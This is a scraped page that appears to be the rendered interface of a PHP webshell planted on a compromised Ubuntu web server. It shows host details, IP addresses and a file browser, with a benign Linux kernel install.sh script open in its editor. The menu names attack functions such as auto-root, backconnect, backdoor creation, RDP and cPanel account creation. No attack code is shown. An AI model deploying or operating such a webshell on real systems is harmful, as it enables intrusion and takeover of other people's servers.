Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.226.133.136
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-210 /
arch /
arm /
boot /
[ HOME SHELL ]
Name
Size
Permission
Action
bootp
[ DIR ]
drwxr-xr-x
compressed
[ DIR ]
drwxr-xr-x
dts
[ DIR ]
drwxr-xr-x
Makefile
3.05
KB
-rw-r--r--
deflate_xip_data.sh
1.71
KB
-rwxr-xr-x
install.sh
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.sh
#!/bin/sh # # arch/arm/boot/install.sh # # This file is subject to the terms and conditions of the GNU General Public # License. See the file "COPYING" in the main directory of this archive # for more details. # # Copyright (C) 1995 by Linus Torvalds # # Adapted from code in arch/i386/boot/Makefile by H. Peter Anvin # Adapted from code in arch/i386/boot/install.sh by Russell King # # "make install" script for arm architecture # # Arguments: # $1 - kernel version # $2 - kernel image file # $3 - kernel map file # $4 - default install path (blank if root directory) # verify () { if [ ! -f "$1" ]; then echo "" 1>&2 echo " *** Missing file: $1" 1>&2 echo ' *** You need to run "make" before "make install".' 1>&2 echo "" 1>&2 exit 1 fi } # Make sure the files actually exist verify "$2" verify "$3" # User may have a custom install script if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi if [ "$(basename $2)" = "zImage" ]; then # Compressed install echo "Installing compressed kernel" base=vmlinuz else # Normal install echo "Installing normal kernel" base=vmlinux fi if [ -f $4/$base-$1 ]; then mv $4/$base-$1 $4/$base-$1.old fi cat $2 > $4/$base-$1 # Install system map file if [ -f $4/System.map-$1 ]; then mv $4/System.map-$1 $4/System.map-$1.old fi cp $3 $4/System.map-$1 if [ -x /sbin/loadmap ]; then /sbin/loadmap else echo "You have to install it yourself" fi
Close